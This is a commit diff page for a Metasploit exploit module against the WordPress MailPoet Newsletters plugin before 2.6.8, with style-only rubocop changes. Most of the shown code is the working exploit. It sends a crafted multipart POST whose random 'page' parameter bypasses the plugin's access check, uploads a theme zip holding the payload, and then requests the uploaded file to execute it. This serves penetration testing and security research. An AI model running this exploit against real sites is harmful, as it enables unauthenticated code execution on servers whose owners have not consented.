Land #3547 - rubocop changes
sinn3r
commit
aa27af96f4
|
|
@ -1,3 +1,5 @@
|
|||
# encoding: UTF-8
|
||||
|
||||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
|
|
@ -12,7 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(
|
||||
info,
|
||||
'Name' => 'Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload',
|
||||
'Description' => %q{
|
||||
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
|
||||
|
|
@ -24,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
|
||||
uses $_REQUEST to check for access rights. By setting the POST parameter to
|
||||
something not beginning with 'wysija_', the check is bypassed. Wordpress uses
|
||||
the $_GET array to determine the page, so it is not affected by this.
|
||||
the $_GET array to determine the page, so it is not affected by this. The developers
|
||||
applied the fixes to all previous versions too.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
@ -58,8 +62,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
|
||||
zip_file = Rex::Zip::Archive.new
|
||||
content.each_pair do |name, content|
|
||||
zip_file.add_file(name, content)
|
||||
content.each_pair do |name, con|
|
||||
zip_file.add_file(name, con)
|
||||
end
|
||||
|
||||
zip_file.pack
|
||||
|
|
@ -67,14 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
|
||||
res = send_request_cgi({
|
||||
res = send_request_cgi(
|
||||
'uri' => readme_url,
|
||||
'method' => 'GET'
|
||||
})
|
||||
)
|
||||
# no readme.txt present
|
||||
if res.nil? || res.code != 200
|
||||
return Msf::Exploit::CheckCode::Unknown
|
||||
end
|
||||
return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
|
||||
|
||||
# try to extract version from readme
|
||||
# Example line:
|
||||
|
|
@ -82,11 +84,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
|
||||
|
||||
# readme present, but no version number
|
||||
if version.nil?
|
||||
return Msf::Exploit::CheckCode::Detected
|
||||
end
|
||||
return Msf::Exploit::CheckCode::Detected if version.nil?
|
||||
|
||||
print_status("#{peer} - Found version #{version} of the plugin")
|
||||
vprint_status("#{peer} - Found version #{version} of the plugin")
|
||||
|
||||
if Gem::Version.new(version) < Gem::Version.new('2.6.8')
|
||||
return Msf::Exploit::CheckCode::Appears
|
||||
|
|
@ -108,19 +108,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
|
||||
data.add_part('themeupload', nil, nil, 'form-data; name="action"')
|
||||
data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
|
||||
# this line bypasses the check implemented in version 2.6.7
|
||||
data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
|
||||
post_data = data.to_s
|
||||
|
||||
payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
|
||||
|
||||
print_status("#{peer} - Uploading payload to #{payload_uri}")
|
||||
res = send_request_cgi({
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
|
||||
'data' => post_data
|
||||
})
|
||||
)
|
||||
|
||||
if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
|
||||
|
|
@ -135,9 +136,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")
|
||||
|
||||
print_status("#{peer} - Executing payload #{payload_uri}")
|
||||
res = send_request_cgi({
|
||||
send_request_cgi(
|
||||
'uri' => payload_uri,
|
||||
'method' => 'GET'
|
||||
})
|
||||
)
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue